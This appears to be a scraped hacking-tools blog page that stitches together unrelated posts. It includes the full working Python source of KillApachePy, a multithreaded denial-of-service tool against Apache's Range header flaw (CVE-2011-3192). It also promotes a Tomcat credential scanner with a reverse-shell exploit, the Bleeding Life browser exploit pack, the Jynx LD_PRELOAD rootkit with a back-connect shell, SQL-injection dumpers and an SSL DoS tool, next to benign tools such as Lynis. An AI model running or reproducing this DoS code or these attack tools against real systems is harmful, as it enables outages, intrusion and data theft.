how to install backtrack 5 R3 on a encrypted hdd and get it working with the latest tools
First of all this is not my work an I will try to mention every source. This is based on one post of Kevin over at www.infosecramblings.com and one of sirwolfgang from disillusion.us
Second, I now Kali is out but I'm just waiting for a more mature project as the dist has a lot of bugs.
This tutorial is for the a 32 bit install but if you have an IQ grater than 60 I'm sure you'll mange to adapt. Also please check the versions downloaded with wget are the latest.
Apache Tomcat Remote Exploit (PUT request) and Account Scanner
The modified pnscan scanner utility scans a range of IPs to find open apache tomcat servers by trying the following login access combinations:
- tomcat:tomcat
- password:password
- admin:admin
- admin:password
- admin:<nopass>
- tomcat:<nopass>
The included perl script can be used to unlock apache tomcat servers remotely by using the collected login combinations.
it will retrieve either a root or SYSTEM reverse shell depending on the operating system or the equivalent of a reverse shell as the current user tomcat is running as. the exploit might contain metasploit logic (thanks to jduck).
By Kingcope
Use this tool at your own risk. No source code review (may contain hidden shell)
Lynis Auditing Tool
Lynis is an auditing tool for Unix (specialists). It scans the system and available software, to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes.
This software aims in assisting automated auditing, software patch management, vulnerability and malware scanning of Unix based systems. It can be run without prior installation, so inclusion on read only storage is no problem (USB stick, cd/dvd).
Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOX (Sarbanes-Oxley) compliance audits.
Intended audience:
Security specialists, penetration testers, system auditors, system/network managers.
Examples of audit tests:
- Available authentication methods
- Expired SSL certificates
- Outdated software
- User accounts without password
- Incorrect file permissions
- Firewall auditing
Supported operating systems
Tested on:
- Arch Linux
- CentOS
- Debian
- Fedora Core 4 and higher
- FreeBSD
- Gentoo
- Knoppix
- Mac OS X
- Mandriva 2007
- OpenBSD 4.x
- OpenSolaris
- OpenSuSE
- PcBSD
- PCLinuxOS
- Red Hat, RHEL 5.x
- Slackware 12.1
- Solaris 10
- Ubuntu
KillApachePy Range Header DoS
If you are following security trends then you've probably heard about the DoS attack against major number of Apache versions by usage of specially crafted Range header (CVE-2011-3192). Based on the original PoC (killapache.pl) I've made a Python version out of it which is more user friendly and has few program workflow enhancements (automatic usage of maximum (system) allowed thread number, setting custom HTTP method (GET/HEAD/...), custom target page for retrieval, proxy support, etc.)
p.s. Python v2.5.x-v2.7.x is recommended for running this tool
[cc lang="python"]#!/usr/bin/env python
import optparse, os, re, socket, threading, time, urllib, urllib2, urlparse
NAME = "KillApachePy (Range Header DoS CVE-2011-3192)"
VERSION = "0.1d"
AUTHOR = "Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)"
LICENSE = "Public domain (FREE)"
SLEEP_TIME = 3 # time to wait for new thread slots (after max number reached)
RANGE_NUMBER = 1024 # number of range subitems forming the DoS payload
USER_AGENT = "KillApachePy (%s)" % VERSION
def attack(url, user_agent=None, method='GET', proxy=None):
url = ("http://%s" % url) if '://' not in url else url
host = urlparse.urlparse(url).netloc
if proxy and not re.match('\Ahttp(s)?://[^:]+:[0-9]+(/)?\Z', proxy, re.I):
print "(x) Invalid proxy address used"
exit(-1)
proxy_support = urllib2.ProxyHandler({'http': proxy} if proxy else {})
opener = urllib2.build_opener(proxy_support)
urllib2.install_opener(opener)
class _MethodRequest(urllib2.Request): # Create any HTTP (e.g. HEAD/PUT/DELETE) request type with urllib2
def set_method(self, method):
self.method = method.upper()
def get_method(self):
return getattr(self, 'method', urllib2.Request.get_method(self))
def _send(check=False): #Send the vulnerable request to the target
if check:
print "(i) Checking target for vulnerability..."
payload = "bytes=0-,%s" % ",".join("5-%d" % item for item in xrange(1, RANGE_NUMBER))
try:
headers = { 'Host': host, 'User-Agent': user_agent or USER_AGENT, 'Range': payload, 'Accept-Encoding': 'gzip, deflate' }
req = _MethodRequest(url, None, headers)
req.set_method(method)
response = urllib2.urlopen(req)
if check:
return response and ('byteranges' in repr(response.headers.headers) or response.code == 206)
except urllib2.URLError, msg:
if any([item in str(msg) for item in ('Too many', 'Connection reset')]):
pass
elif 'timed out' in str(msg):
print "\r(i) Server seems to be choked ('%s')" % msg
else:
print "(x) Connection error ('%s')" % msg
if check or 'Forbidden' in str(msg):
os._exit(-1)
except Exception, msg:
raise
try:
if not _send(check=True):
print "(x) Target does not seem to be vulnerable"
else:
print "(o) Target seems to be vulnerable\n"
quit = False
while not quit:
threads = []
print "(i) Creating new threads..."
try:
while True:
thread = threading.Thread(target=_send)
thread.start()
threads.append(thread)
except KeyboardInterrupt:
quit = True
raise
except Exception, msg:
if 'new thread' in str(msg):
print "(i) Maximum number of new threads created (%d)" % len(threads)
else:
print "(x) Exception occured ('%s')" % msg
finally:
if not quit:
print "(o) Waiting for %d seconds to acquire new threads" % SLEEP_TIME
time.sleep(SLEEP_TIME)
print
except KeyboardInterrupt:
print "\r(x) Ctrl-C was pressed"
os._exit(1)
if __name__ == "__main__":
print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
parser = optparse.OptionParser(version=VERSION)
parser.add_option("-u", dest="url", help="Target url (e.g. \"http://www.target.com/index.php\")")
parser.add_option("--agent", dest="agent", help="User agent (e.g. \"Mozilla/5.0 (Linux)\")")
parser.add_option("--method", dest="method", default='GET', help="HTTP method used (default: GET)")
parser.add_option("--proxy", dest="proxy", help="Proxy (e.g. \"http://127.0.0.1:8118\")")
options, _ = parser.parse_args()
if options.url:
result = attack(options.url, options.agent, options.method, options.proxy)
else:
parser.print_help()[/cc]
Joomscan Security Scanner Updated
Joomscan Security Scanner updated recently with new database have 550 vulnerabilities. Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla web site. Last update for this tool was in August, 2009 with 466 vulnerabilities.
In joomscan you can check for new updates with command:
./joomscan.pl check or ./joomscan.pl update.
Download for Windows (141 KB)
Download for Linux (150 KB)
pythonsqldumper
This is a open source SQL dumper written in python.
Features:
- Databases support : MySQL
- Injection methods : INBAND, BLIND
- Injection in all parameters sent to server GET, POST, HEADERS (Cookie, User-Agent,...)
- Custom headers
- Supports mod_rewrite injection
- Supports injection in parameters encoded in base64 algoritm
- Supports proxy (HTTP, SOCKET4, SOCKET5)
- Supports injection in HTTPS throw proxy (only socket)
- Supports custom user query injection
- Save all extracted data to a dump file
- Dumps only structure of database
- Increases delay between two consecutive failed requests (allow the server to chill down)
- Delay between requests
Bugs and suggestions at : tdx_ev@yahoo.com. Download here. Project here
ThcSslDOS
Description
THC has released a DOS tool that exploits SSL renegotiation to perform a denial of service on a given SSL server. It uses renegotiation to constantly trigger new SSL handshakes with the server, using one single TCP connection. See http://www.thc.org/thc-ssl-dos/ . For more information about renegotiation, see InsecureRenegotiation.
Detection
The current version of THC's SSL DOS tool requires the server to honor client-initiated renegotiations in order to work.
[cc lang="bash"]$ python sslyze.py --reneg www.server.com:443 [/cc]
Recommendation
A mitigation against the current version of THC's SSL DOS tool is to prevent the server from honoring client-initiated renegotiations. However, as explained on their website, "The tool can be modified to work without SSL-RENEGOTIATION by just establishing a new TCP connection for every new handshake".
Download here
Bleeding Life – Exploit Pack Released
Bleeding Life 2 is an exploit pack that affects the web browsers on the Microsoft Windows operating system with remote code execution buffer overflows.
-
Features Advanced Statistical Information
Stylish Progress Bars
Full User-Friendly Admin Panel
Referer Stats
Secure Panel - Login/Logout
Ability To Set and Save Passwords On Panel
Ability To Allow Guest Access - Guest Can Only View Stats Page, Clicking and Other Pages Disabled.
Ability To Add and/or Remove Exploits Used
Ability To Add Scan4You Credentials For Built-In Scanner Use
Ability To Filter Browsers
Ability To Filter Operating Systems
Attempt To Detect and Filter HTTP Proxies
Ability To Blacklist by IP/Range
Ability To Import Blacklist
On Panel Built In Scanner
Ability To Upload Payload From Panel
Payload Statistical Information - MD5, Size, SHA1
Ability To Generate iFrame On Panel / Encrypted
Ability To Domain Check/Scan On Panel
Info: Before running Bleeding Life 2's installer, you must first fill out config.php, which has been thoroughly commented for your ease of use.
The installer is located at $DOCUMENT_ROOT/install. Installation is incredibly easy.
Server Requirements
-
MySQL
PHP
HTTPD (apache, lighttpd, nginx, etc)
Jynx Kit (LD_PRELOAD) Userland Rootkit Released
Jynx Kit is a LD_PRELOAD userland rootkit. Fully undetectable from chkrootkit and rootkithunter. Includes magic packet SSL reverse back connect shell based on SEQ/ACK numbers in a single packet. Solid building block for further LD_PRELOAD rootkits.
Gate One – HTML5 web-based SSH client/terminal emulator
Gate One is an HTML5 web-based terminal emulator and SSH client. Top features:
* No browser plugins required!
* Supports multiple simultaneous terminal sessions. As many as your
hardware can handle.
* Users can re-connect to their running terminals whenever they like from
anywhere.
* Can be embedded into other applications. Add a terminal--running whatever
application(s) you want--to your web app! Would be vastly superior to
say, a Java-based serial console applet (hint hint).
* Includes powerful plugin system that supports plugins written in Python,
JavaScript, and even CSS (yes, you can write a CSS-only plugin).
* The Gate One server can be stopped & started without users losing their
running terminal applications (even SSH sessions stay connected!). In
essence, worry-free upgrades!
* The SSH plugin allows users to duplicate sessions without having to
re-enter their username and password (it re-uses the existing SSH tunnel).
* Provides users with the ability to play back and save/share their terminal
sessions via a self-contained HTML playback file.
* Similarly, supports server-side logging, recording, and video-like
playback of user sessions. It can even log to syslog to support
whatever centralized logging system you want.
* Keberos-based Single Sign-on support is included. It even works with
Active Directory. Other authentication options are available as well.
All documentation is in the "gateone/docs" directory. The HTML documentation is
pre-built and ready-to-read.
IMPORTANT: Gate One is currently IN BETA. Some things may be incomplete or
buggy. Feel free to open new tickets in the issue tracker!
FYI: Gate One was developed entirely by one guy in his spare time over the
course of ~9 months. It turned out pretty good so he's looking to start a
business out of it. What better way to create jobs than to start by creating
one for yourself? All feedback, tips, and advice is appreciated:
daniel.mcdougall@liftoffsoftware.com
NOTE: http://liftoffsoftware.com/ hasn't been built yet so links pointing there
will be dead for a while.
Disclaimer
Categories
- android (1)
- antivirus (1)
- backup (1)
- backup exec (2)
- bruteforce (6)
- conference (2)
- CRSF (2)
- DirectAdmin (1)
- DoS (11)
- enumeration (2)
- Fără categorie (2)
- flash (2)
- Fuzzer (2)
- games (1)
- hacking (116)
- how-to (32)
- Information gathering (2)
- lfi (3)
- linux (27)
- mobile (1)
- ms exchange (2)
- News (2)
- Phishing (1)
- php (1)
- rdp (1)
- rfi (5)
- rootkit (1)
- scripts (33)
- seo (1)
- sniff (3)
- social engineering (2)
- source code (33)
- sqli (16)
- ssh (2)
- symantec (3)
- tools (73)
- tutorials (20)
- tutorials (1)
- Uncategorized (7)
- vranger (1)
- windows (12)
- wireless (1)
- wsus (1)
- xpath (1)
- xsrf (1)
- xss (12)
